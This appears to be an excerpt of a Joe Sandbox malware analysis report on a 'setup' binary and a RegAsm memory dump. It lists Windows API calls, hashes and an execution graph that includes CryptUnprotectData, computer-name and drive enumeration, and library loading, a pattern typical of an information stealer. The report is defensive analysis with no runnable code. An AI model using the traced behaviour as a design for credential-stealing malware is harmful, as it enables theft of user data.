              • Opcode Fuzzy Hash: b17ec5728f120128c3a4cf580f5fb32bcc72beeb30e8bff1cfd4b237bed5000c
              • Instruction Fuzzy Hash: 4F01DF75A002959BDB0AEF22DD0597E7BA1FF84740B044009E802573D2CF74AE02CBA1
              APIs
              • LoadLibraryExW.KERNEL32(00B162A8,00000000,00000800,?,00AEFB23,00000000,?,?,?,?,?,00AEFC4D,00000002,FlsGetValue,00B0E068,FlsGetValue), ref: 00AEFB7F
              • GetLastError.KERNEL32(?,00AEFB23,00000000,?,?,?,?,?,00AEFC4D,00000002,FlsGetValue,00B0E068,FlsGetValue,00000000,?,00AEEADD), ref: 00AEFB89
              • LoadLibraryExW.KERNEL32(00B162A8,00000000,00000000,?,00B162A8,?,?,?,?,?,?,00B16140,?,00B16140,?,00000000), ref: 00AEFBB1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID: api-ms-
              • API String ID: 3177248105-2084034818
              • Opcode ID: f2266517fd8a0fabf3e3a3bd7260826a46a76e7409f03428291878391ceccbe7
              • Instruction ID: 8125acda3b35992aa97ac846138418ef757fbfbbc79b2261e2aa0d6d9ac60f18
              • Opcode Fuzzy Hash: f2266517fd8a0fabf3e3a3bd7260826a46a76e7409f03428291878391ceccbe7
              • Instruction Fuzzy Hash: F0E04F31280208FFEF201BB2ED06F183E5AEB10B40F104470FB0CA80E1FBA1D910D585
              APIs
              • GetConsoleOutputCP.KERNEL32(AD69BC82,00000000,00000000,00000000), ref: 00AFD7F0
                • Part of subcall function 00B0237F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B01DD8,?,00000000,-00000008), ref: 00B0242B
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AFDA4B
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00AFDA93
              • GetLastError.KERNEL32 ref: 00AFDB36
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: 75913a9e8e1d8d115c036c237a0a1987a27c1f9cd9600e214d72a617f903ffdf
              • Instruction ID: bf65f609d78a48053f20d6f00bd6c05a9e6bb58fa68d980a610704d673092f98
              • Opcode Fuzzy Hash: 75913a9e8e1d8d115c036c237a0a1987a27c1f9cd9600e214d72a617f903ffdf
              • Instruction Fuzzy Hash: F9D15A75D042589FCB16CFE8C880AADBBF6FF08314F18466AE956E7351E730A941CB50
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: AdjustPointer
              • String ID:
              • API String ID: 1740715915-0
              • Opcode ID: dd2fe6436780f72d4d19a2dde33729e167d5aff7d1618e3197a02c77f104feef
              • Instruction ID: 413e35c8dab7e48db43164ec41372209c54b0ea96c8ecea03af109a099fbbe6e
              • Opcode Fuzzy Hash: dd2fe6436780f72d4d19a2dde33729e167d5aff7d1618e3197a02c77f104feef
              • Instruction Fuzzy Hash: 24510272A00686AFDB28DF56C941BBA77B4FF80714F24452DE80687291E731EC91C7D1
              APIs
              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00B06AD8,00000000,00000001,00000000,00000000,?,00AFDB8A,00000000,00000000,00000000), ref: 00B0A1F4
              • GetLastError.KERNEL32(?,00B06AD8,00000000,00000001,00000000,00000000,?,00AFDB8A,00000000,00000000,00000000,00000000,00000000,?,00AFE148,00000000), ref: 00B0A200
                • Part of subcall function 00B0A1C6: CloseHandle.KERNEL32(FFFFFFFE,00B0A210,?,00B06AD8,00000000,00000001,00000000,00000000,?,00AFDB8A,00000000,00000000,00000000,00000000,00000000), ref: 00B0A1D6
              • ___initconout.LIBCMT ref: 00B0A210
                • Part of subcall function 00B0A188: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B0A1B7,00B06AC5,00000000,?,00AFDB8A,00000000,00000000,00000000,00000000), ref: 00B0A19B
              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00B06AD8,00000000,00000001,00000000,00000000,?,00AFDB8A,00000000,00000000,00000000,00000000), ref: 00B0A225
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: b537b0fdf282ea78958e262b617bbe7cac88b1eef12439729db4bf9391241c84
              • Instruction ID: 385f3c1383e0b0a5e37ea3333bad146a69669f8491f8d45d20edcdf22e3ee719
              • Opcode Fuzzy Hash: b537b0fdf282ea78958e262b617bbe7cac88b1eef12439729db4bf9391241c84
              • Instruction Fuzzy Hash: E0F0C076500214BBCF222FD5EC04A9E7FA6FB193E1F044950FE1996170DB728861EBA1
              APIs
              • ___except_validate_context_record.LIBVCRUNTIME ref: 00AEE86F
              • __IsNonwritableInCurrentImage.LIBCMT ref: 00AEE923
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: CurrentImageNonwritable___except_validate_context_record
              • String ID: csm
              • API String ID: 3480331319-1018135373
              • Opcode ID: ab982d200adf55a8d1e314686a4c7d268249d0da1431b1671357124562edbdc0
              • Instruction ID: 2c92105e95572bba88117f7114c501d96b532f92a025a061dcf5513a34d060e0
              • Opcode Fuzzy Hash: ab982d200adf55a8d1e314686a4c7d268249d0da1431b1671357124562edbdc0
              • Instruction Fuzzy Hash: 4241E534A002999FCF10DF6AC884A9EBBF5EF44324F1484A5E819AB392D731DA05CB91
              APIs
              • EncodePointer.KERNEL32(00000000,?), ref: 00AEF162
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              • Opcode ID: 585b986a4a851d05485c5a7df5b0c5b08dc0519c1993ad801482a9f659f07bbb
              • Instruction ID: f14d526d04ca398fcc47aca66b173105b7bedb73c2b65c630f4dacf8bba31c04
              • Opcode Fuzzy Hash: 585b986a4a851d05485c5a7df5b0c5b08dc0519c1993ad801482a9f659f07bbb
              • Instruction Fuzzy Hash: DA41A976A00249EFDF15DF99CD81AEEBBB1FF48304F1881A9FA08A7211D3359A50CB51
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE3235
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AE327A
                • Part of subcall function 00AE95EE: _Yarn.LIBCPMT ref: 00AE960D
                • Part of subcall function 00AE95EE: _Yarn.LIBCPMT ref: 00AE9631
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
              • String ID: bad locale name
              • API String ID: 1908188788-1405518554
              • Opcode ID: 2e6260561893ac62df567f633decb7beb8522749db3bafc26af07b30c67e672e
              • Instruction ID: a2ce54e2ba4c3ed58faa605ea98b40d3b38290175242048b1f02cdf7f18b4a02
              • Opcode Fuzzy Hash: 2e6260561893ac62df567f633decb7beb8522749db3bafc26af07b30c67e672e
              • Instruction Fuzzy Hash: B3F03A71105B809ED370DF7A8505743BEE0AF29314F048E5EE4DAC7A91E375E508CBA6
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00AE3BEF
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE3C0A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: Lockitstd::_$Lockit::_Lockit::~_
              • String ID: ios_base::badbit set
              • API String ID: 593203224-3882152299
              • Opcode ID: af0383f2fabcc766142ac4820dbb29cf236d2050a0de911a13818efb2f0b6800
              • Instruction ID: bb9a78ccf809feb59ba77cc4983c254f3e08f086ec586f5680f9a491bb90bf75
              • Opcode Fuzzy Hash: af0383f2fabcc766142ac4820dbb29cf236d2050a0de911a13818efb2f0b6800
              • Instruction Fuzzy Hash: 64E08C71100242DFD724EF15DD55B92B7E0EF54350F200A2EE0C293190EFB09880DB40

              Execution Graph

              Execution Coverage:15.8%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:30.3%
              Total number of Nodes:350
              Total number of Limit Nodes:23
              execution_graph 10932 4114c1 10933 4114d1 10932->10933 10936 40a2d0 10933->10936 10935 4114f2 10937 40a2e5 10936->10937 10939 40a337 10936->10939 10940 4327d0 10937->10940 10939->10935 10941 432876 RtlExpandEnvironmentStrings 10940->10941 10942 43283f 10940->10942 10942->10941 10943 4328c7 10946 4381c0 10943->10946 10947 4328ef GetVolumeInformationW 10946->10947 11176 415b04 11177 415b09 11176->11177 11178 438d00 LdrInitializeThunk 11177->11178 11179 415c7d 11178->11179 11184 425e08 11186 425e28 11184->11186 11185 425f3b FreeLibrary 11187 425f4a 11185->11187 11186->11185 11188 425f5a GetComputerNameExA 11187->11188 11189 425fc9 GetComputerNameExA 11188->11189 11191 426104 11189->11191 10948 41f2cc 10952 41f0a0 10948->10952 10953 41f092 10948->10953 10952->10953 10954 41efc0 10952->10954 10955 439610 10952->10955 10959 439df0 10952->10959 10954->10953 10967 4362b0 LdrInitializeThunk 10954->10967 10956 439630 10955->10956 10958 43975e 10956->10958 10968 4362b0 LdrInitializeThunk 10956->10968 10958->10952 10961 439e34 10959->10961 10960 439eae 10966 439fbe 10960->10966 10970 4344d0 10960->10970 10961->10960 10969 4362b0 LdrInitializeThunk 10961->10969 10964 439ef1 10964->10966 10973 4362b0 LdrInitializeThunk 10964->10973 10966->10952 10967->10953 10968->10958 10969->10960 10971 434511 10970->10971 10972 434558 RtlAllocateHeap 10970->10972 10971->10972 10972->10964 10973->10966 10974 419c50 10975 419c64 10974->10975 10977 419d3c 10974->10977 10978 419d80 10975->10978 10979 419de5 10978->10979 10982 438f00 10979->10982 10981 419efd 10981->10977 10983 438f20 10982->10983 10984 43908e 10983->10984 10986 4362b0 LdrInitializeThunk 10983->10986 10984->10981 10986->10984 10987 412fd0 10988 412fe0 10987->10988 10993 4157b0 10988->10993 10990 412ff7 10991 40a2d0 RtlExpandEnvironmentStrings 10990->10991 10992 413001 10991->10992 10994 4157d0 10993->10994 10994->10994 10995 4157da RtlExpandEnvironmentStrings 10994->10995 10996 415808 10995->10996 10997 415818 RtlExpandEnvironmentStrings 10996->10997 10998 415897 10997->10998 10998->10998 11006 438d00 10998->11006 11000 415ade 11000->11000 11002 4159be 11002->11000 11004 415a17 11002->11004 11010 439200 11002->11010 11016 4390e0 11002->11016 11004->10990 11004->11000 11020 4362b0 LdrInitializeThunk 11004->11020 11008 438d20 11006->11008 11007 438eae 11007->11002 11008->11007 11021 4362b0 LdrInitializeThunk 11008->11021 11012 439244 11010->11012 11011 4393be 11011->11002 11014 4392ce 11012->11014 11022 4362b0 LdrInitializeThunk 11012->11022 11014->11011 11023 4362b0 LdrInitializeThunk 11014->11023 11018 439126 11016->11018 11017 4391ae 11017->11002 11018->11017 11024 4362b0 LdrInitializeThunk 11018->11024 11020->11000 11021->11007 11022->11014 11023->11011 11024->11017 11195 432b12 11196 438d00 LdrInitializeThunk 11195->11196 11197 432b25 11196->11197 11198 432c02 11197->11198 11199 432db9 11197->11199 11201 4344d0 RtlAllocateHeap 11197->11201 11203 432b34 11197->11203 11204 432bde 11197->11204 11198->11203 11209 4362b0 LdrInitializeThunk 11198->11209 11219 434b10 11199->11219 11206 432b4b 11201->11206 11204->11198 11204->11199 11204->11203 11211 434a30 11204->11211 11215 4348f0 11204->11215 11206->11204 11210 4362b0 LdrInitializeThunk 11206->11210 11209->11203 11210->11204 11212 434a46 11211->11212 11213 434ade 11211->11213 11212->11213 11227 4362b0 LdrInitializeThunk 11212->11227 11213->11204 11216 4349ee 11215->11216 11217 434907 11215->11217 11216->11204 11217->11216 11228 4362b0 LdrInitializeThunk 11217->11228 11220 434d30 11219->11220 11221 434b2b 11219->11221 11220->11203 11221->11220 11224 434bce 11221->11224 11229 4362b0 LdrInitializeThunk 11221->11229 11222 434a30 LdrInitializeThunk 11222->11220 11225 434cfe 11224->11225 11230 4362b0 LdrInitializeThunk 11224->11230 11225->11220 11225->11222 11227->11213 11228->11216 11229->11224 11230->11225 11025 415e52 11027 415e60 11025->11027 11026 4161f7 CryptUnprotectData 11027->11026 11231 41ac92 11232 41ac97 11231->11232 11233 41ad1f 11232->11233 11235 41c060 11232->11235 11236 41c076 11235->11236 11239 41c130 11235->11239 11236->11236 11237 438d00 LdrInitializeThunk 11236->11237 11236->11239 11238 41c20d 11237->11238 11238->11239 11240 438d00 LdrInitializeThunk 11238->11240 11241 41c24a 11238->11241 11239->11233 11240->11241 11241->11239 11242 439200 LdrInitializeThunk 11241->11242 11244 41c26c 11242->11244 11244->11239 11244->11244 11245 4362b0 LdrInitializeThunk 11244->11245 11245->11239 11246 419794 11247 438d00 LdrInitializeThunk 11246->11247 11248 4197be 11247->11248 11028 436954 11029 43698f 11028->11029 11031 4369fe 11029->11031 11034 4362b0 LdrInitializeThunk 11029->11034 11033 4362b0 LdrInitializeThunk 11031->11033 11033->11031 11034->11031 11035 416259 11036 416260 11035->11036 11042 41631e 11036->11042 11043 4362b0 LdrInitializeThunk 11036->11043 11038 416412 11044 402fe0 11038->11044 11040 4164dc 11041 438f00 LdrInitializeThunk 11041->11042 11042->11038 11042->11040 11042->11041 11042->11042 11043->11042 11045 4030f7 11044->11045 11046 402fee 11044->11046 11047 4030be 11046->11047 11049 403003 11046->11049 11051 403061 11046->11051 11050 402fe0 RtlFreeHeap 11047->11050 11047->11051 11048 403043 11055 434662 RtlFreeHeap 11048->11055 11049->11045 11049->11048 11052 402fe0 RtlFreeHeap 11049->11052 11050->11047 11056 434662 RtlFreeHeap 11051->11056 11052->11049 11057 41a45e 11058 41a498 11057->11058 11061 41a660 11058->11061 11062 438d00 LdrInitializeThunk 11061->11062 11063 41a6b9 11062->11063 11064 41e163 11065 439610 LdrInitializeThunk 11064->11065 11066 41e17d 11065->11066 11066->11066 11067 439610 LdrInitializeThunk 11066->11067 11069 439df0 2 API calls 11066->11069 11070 41efc0 11066->11070 11067->11066 11068 41f092 11069->11066 11070->11068 11072 4362b0 LdrInitializeThunk 11070->11072 11072->11068 11073 4217e0 11074 4216b0 11073->11074 11075 4217f6 11073->11075 11078 439610 LdrInitializeThunk 11074->11078 11075->11074 11080 421936 11075->11080 11082 421a90 11075->11082 11077 421ba3 11078->11080 11079 439610 LdrInitializeThunk 11079->11080 11080->11079 11082->11077 11082->11080 11084 439aa0 11082->11084 11092 43a180 11082->11092 11100 4362b0 LdrInitializeThunk 11082->11100 11085 439ae4 11084->11085 11087 439b5e 11085->11087 11101 4362b0 LdrInitializeThunk 11085->11101 11086 4344d0 RtlAllocateHeap 11089 439b9e 11086->11089 11087->11086 11091 439c62 11087->11091 11089->11091 11102 4362b0 LdrInitializeThunk 11089->11102 11091->11082 11095 43a1a0 11092->11095 11093 43a28e 11094 4344d0 RtlAllocateHeap 11093->11094 11099 43a392 11093->11099 11096 43a2d3 11094->11096 11095->11093 11103 4362b0 LdrInitializeThunk 11095->11103 11096->11099 11104 4362b0 LdrInitializeThunk 11096->11104 11099->11082 11100->11082 11101->11087 11102->11091 11103->11093 11104->11099 11253 42ec21 11254 42ec26 11253->11254 11255 42ecab KiUserCallbackDispatcher GetSystemMetrics 11254->11255 11256 42ecf2 DeleteObject 11255->11256 11258 42ed51 SelectObject 11256->11258 11260 42ee0d SelectObject 11258->11260 11261 42ee39 DeleteObject 11260->11261 11263 42ee88 11261->11263 11264 4148a5 11265 4148b5 11264->11265 11288 41d4e0 11265->11288 11267 4148bb 11268 40a2d0 RtlExpandEnvironmentStrings 11267->11268 11269 4148c5 11268->11269 11270 40a2d0 RtlExpandEnvironmentStrings 11269->11270 11271 4148e2 11270->11271 11300 41dfb0 11271->11300 11274 40a2d0 RtlExpandEnvironmentStrings 11275 414902 11274->11275 11306 420940 11275->11306 11277 414921 11314 420da0 11277->11314 11280 40a2d0 RtlExpandEnvironmentStrings 11281 414934 11280->11281 11317 422f20 11281->11317 11283 41494e 11284 40a2d0 RtlExpandEnvironmentStrings 11283->11284 11285 414958 11284->11285 11286 42e310 6 API calls 11285->11286 11287 414977 11286->11287 11289 41d560 11288->11289 11290 41d5c3 RtlExpandEnvironmentStrings 11288->11290 11289->11289 11289->11290 11291 41d60e 11290->11291 11292 41d61e RtlExpandEnvironmentStrings 11291->11292 11293 41d688 11292->11293 11293->11293 11294 438f00 LdrInitializeThunk 11293->11294 11296 41d7a4 11294->11296 11295 41a660 LdrInitializeThunk 11299 41daf4 11295->11299 11297 438f00 LdrInitializeThunk 11296->11297 11298 41d994 11296->11298 11296->11299 11297->11298 11298->11295 11298->11299 11299->11267 11301 41dfc3 11300->11301 11301->11301 11302 439610 LdrInitializeThunk 11301->11302 11303 41e0b3 11302->11303 11304 4148f8 11303->11304 11305 439aa0 2 API calls 11303->11305 11304->11274 11305->11304 11309 42097b 11306->11309 11307 4209de 11308 4344d0 RtlAllocateHeap 11307->11308 11313 420aae 11307->11313 11311 420a18 11308->11311 11309->11307 11323 4362b0 LdrInitializeThunk 11309->11323 11311->11313 11324 4362b0 LdrInitializeThunk 11311->11324 11313->11277 11325 420dc0 11314->11325 11316 41492a 11316->11280 11318 422ff6 RtlExpandEnvironmentStrings 11317->11318 11319 422f89 11317->11319 11320 42303e 11318->11320 11319->11318 11321 42304e RtlExpandEnvironmentStrings 11320->11321 11322 4230a3 11321->11322 11323->11307 11324->11313 11326 420e38 11325->11326 11326->11326 11329 4346a0 11326->11329 11328 420e89 11332 4346dd 11329->11332 11330 43473e 11331 4344d0 RtlAllocateHeap 11330->11331 11336 43481e 11330->11336 11333 43477b 11331->11333 11332->11330 11337 4362b0 LdrInitializeThunk 11332->11337 11333->11336 11338 4362b0 LdrInitializeThunk 11333->11338 11336->11328 11337->11330 11338->11336 11105 435f65 GetLogicalDrives 11109 4362e0 11105->11109 11107 435f70 GetLogicalDrives 11108 435f7b 11107->11108 11110 41ffec 11111 420141 11110->11111 11112 439610 LdrInitializeThunk 11111->11112 11118 4201a9 11112->11118 11113 4201de 11115 439610 LdrInitializeThunk 11115->11118 11116 439aa0 2 API calls 11116->11118 11117 43a180 2 API calls 11117->11118 11118->11113 11118->11115 11118->11116 11118->11117 11119 4362b0 LdrInitializeThunk 11118->11119 11120 439790 11118->11120 11119->11118 11122 4397d4 11120->11122 11121 43984e 11123 4344d0 RtlAllocateHeap 11121->11123 11127 439962 11121->11127 11122->11121 11128 4362b0 LdrInitializeThunk 11122->11128 11125 439891 11123->11125 11125->11127 11129 4362b0 LdrInitializeThunk 11125->11129 11127->11118 11127->11127 11128->11121 11129->11127 11339 41092f 11340 410938 11339->11340 11341 40a2d0 RtlExpandEnvironmentStrings 11340->11341 11342 410942 11341->11342 11343 417e2e 11344 417e40 11343->11344 11344->11344 11345 417e4a RtlExpandEnvironmentStrings 11344->11345 11346 417e7a 11345->11346 11347 417e89 RtlExpandEnvironmentStrings 11346->11347 11348 438f00 LdrInitializeThunk 11347->11348 11350 417eab 11348->11350 11349 417f3a RtlExpandEnvironmentStrings 11349->11350 11350->11349 11351 417ecb RtlExpandEnvironmentStrings 11350->11351 11352 438f00 LdrInitializeThunk 11351->11352 11352->11350 11130 417f71 11131 417faf 11130->11131 11132 417f7b 11130->11132 11132->11131 11133 41a660 LdrInitializeThunk 11132->11133 11133->11131 11134 409870 11136 409879 11134->11136 11137 409897 11136->11137 11140 40988c ExitProcess 11136->11140 11143 40ac10 11136->11143 11148 436180 11137->11148 11141 40989e 11141->11137 11147 40bb50 FreeLibrary 11141->11147 11145 40ac23 11143->11145 11144 40ad4d LoadLibraryExW 11146 40ad80 11144->11146 11145->11144 11145->11145 11146->11141 11147->11137 11151 437b30 11148->11151 11150 436185 FreeLibrary 11150->11140 11152 437b39 11151->11152 11152->11150 11353 426b33 11355 426b59 11353->11355 11354 426c9e 11355->11354 11357 4362b0 LdrInitializeThunk 11355->11357 11357->11354 11358 41b535 11359 4344d0 RtlAllocateHeap 11358->11359 11360 41b541 11359->11360 11361 435e37 11363 435e42 11361->11363 11362 435f0f LoadLibraryExW 11364 435f1d 11362->11364 11363->11362 11365 4153b5 11366 4153f0 11365->11366 11366->11366 11367 438d00 LdrInitializeThunk 11366->11367 11368 4154bf 11367->11368 11369 415741 11368->11369 11370 415778 11368->11370 11371 4154fe 11368->11371 11372 4390e0 LdrInitializeThunk 11368->11372 11377 4154da 11368->11377 11369->11371 11373 439200 LdrInitializeThunk 11369->11373 11374 439200 LdrInitializeThunk 11370->11374 11372->11377 11373->11370 11375 41579e 11374->11375 11377->11369 11377->11370 11377->11371 11378 4362b0 LdrInitializeThunk 11377->11378 11378->11369 11156 436f74 11158 436faf 11156->11158 11157 43701e 11158->11157 11160 4362b0 LdrInitializeThunk 11158->11160 11160->11157 11161 42b979 11163 42b97e 11161->11163 11162 42babc SysAllocString 11164 42bb2e 11162->11164 11163->11162 11163->11163 11165 414a7e 11166 40a2d0 RtlExpandEnvironmentStrings 11165->11166 11167 414a8a 11166->11167 11172 4361fc 11173 436223 11172->11173 11174 436275 RtlReAllocateHeap 11172->11174 11173->11174 11175 4362a0 11174->11175
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
              • API ID:
              • String ID: FV$ME$RU$_Y$nm${e$us$}{
              • API String ID: 0-3137052455
              • Opcode ID: a4d1783f41ba9e83b6abd42f9078035ee67ff372bed82c81e97ea8b72eb6dba6
              • Instruction ID: 18095c0d613c7e4fca07a97df36040dffd14ae9a72e678db831ef0531e338534
              • Opcode Fuzzy Hash: a4d1783f41ba9e83b6abd42f9078035ee67ff372bed82c81e97ea8b72eb6dba6
              • Instruction Fuzzy Hash: 9FB29BB5608341CFD318CF18D890B6BB7E1FF8A354F14892DE4999B3A1D734A985CB86

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 368 41d4e0-41d55e 369 41d560-41d5c1 368->369 370 41d5c3-41d60c RtlExpandEnvironmentStrings 368->370 369->369 369->370 371 41d615 370->371 372 41d60e-41d613 370->372 373 41d618-41d686 call 409210 RtlExpandEnvironmentStrings 371->373 372->373 376 41d6e7-41d719 373->376 377 41d688 373->377 379 41d722-41d724 376->379 380 41d71b-41d720 376->380 378 41d690-41d6e5 377->378 378->376 378->378 381 41d727-41d73c call 409210 379->381 380->381 384 41d761-41d771 381->384 385 41d73e-41d743 381->385 387 41d791-41d7b3 call 438f00 384->387 388 41d773-41d77a 384->388 386 41d750-41d75f 385->386 386->384 386->386 392 41d9c0-41da94 387->392 393 41d9a5-41d9b2 387->393 394 41d7ba-41d7c4 387->394 395 41d9ba 387->395 396 41d7cd-41d888 387->396 397 41daff-41db36 387->397 389 41d780-41d78f 388->389 389->387 389->389 402 41dae0-41daef call 41a660 392->402 403 41da96 392->403 393->395 394->396 395->392 400 41d8d8-41d906 396->400 401 41d88a 396->401 398 41db38 397->398 399 41db9c-41dc41 397->399 406 41db40-41db9a 398->406 407 41dc43 399->407 408 41dc95-41dcb6 call 41a3c0 399->408 410 41d908-41d90d 400->410 411 41d90f-41d911 400->411 409 41d890-41d8d6 401->409 412 41daf4-41daf7 402->412 404 41daa0-41dade 403->404 404->402 404->404 406->399 406->406 413 41dc50-41dc93 407->413 421 41dcc0 408->421 409->400 409->409 415 41d914-41d929 call 409210 410->415 411->415 412->397 413->408 413->413 419 41d951-41d961 415->419 420 41d92b-41d932 415->420 423 41d981-41d99e call 438f00 419->423 424 41d963-41d96a 419->424 422 41d940-41d94f 420->422 425 41dcc6 421->425 422->419 422->422 423->393 423->395 423->397 423->421 423->425 429 41dccc-41dcdb call 409220 423->429 430 41dce0 423->430 431 41dcf5-41dcfe 423->431 432 41dce6 423->432 433 41dd08-41dd0e call 409220 423->433 434 41dcec-41dcf2 call 409220 423->434 435 41dcff-41dd05 call 409220 423->435 426 41d970-41d97f 424->426 425->429 426->423 426->426 429->430 430->432 432->434 444 41dd11 433->444 434->431 435->433 444->444
              APIs
              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000E,00000000,00000000,?), ref: 0041D5FD
              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000E,00000000,?,?), ref: 0041D62D
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2115819621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
              Similarity
